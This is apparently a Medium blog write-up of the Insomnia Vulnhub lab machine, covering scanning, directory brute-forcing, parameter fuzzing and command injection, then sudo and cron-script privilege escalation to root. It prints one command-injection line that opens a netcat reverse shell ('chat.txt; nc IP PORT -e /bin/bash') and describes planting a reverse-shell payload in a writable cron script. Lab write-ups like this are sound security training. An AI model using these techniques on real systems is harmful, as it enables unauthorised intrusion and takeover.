Insomnia Vulnhub Writeup (First blood)

Difficulty: Easy/Medium (In my opinion)

NMAP:

Nice port 8080 is open, so let’s browse

as we can see there is a chat, but we can’t do anything so, we use dirb to brute-force directories

DIRB:

Ok we found the directory “administration.php” and other but there are rabbit hole , let’s browse this directory

Nice “Your activity has been logged”, but we can do nothing here, so let’s fuzz some parameter

ARJUN:

We found the parameter “logfile” so , we can do an LFI? mmmh No! Doesn’t work, but we can do command injection, and the result will appear directly in the chat!

COMMAND INJECTION:

And

Will appear some files! Nice , we notice that “chat.txt” can execute commands so

And

Wow! www-data so , let’s go for the reverse shell!

Command: chat.txt; nc IP PORT -e /bin/bash and listen first!

HORIZONTAL PRIVILEGE ESCALATION:

sudo -l

Nice that “start.sh” had user “julia” privilege, so add /bin/bash in that script

Nice!!!

VERTICAL PRIVILEGE ESCALATION:

Initially we do not notice anything interesting but, if we try to see in / etc / crontab we notice a file running on the system and running, so we can exploit it.

For convenience it uses pspy64 which shows me the files that are running on the system. To understand how often it is performed.

Now put pspy64 on target shell in /tmp directory and give privilege “chmod +x pspy64 and run it ./pspy64

And run now!

as we can see every 1 minutes, we run the “check.sh” script so we also notice that it is an editable file! Then let’s add our payload for the reverse shell.

Just wait and listen on port 4444, and…..

WE ARE ROOT!

Thank you everyone, i hope this is useful!

-0xJin

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store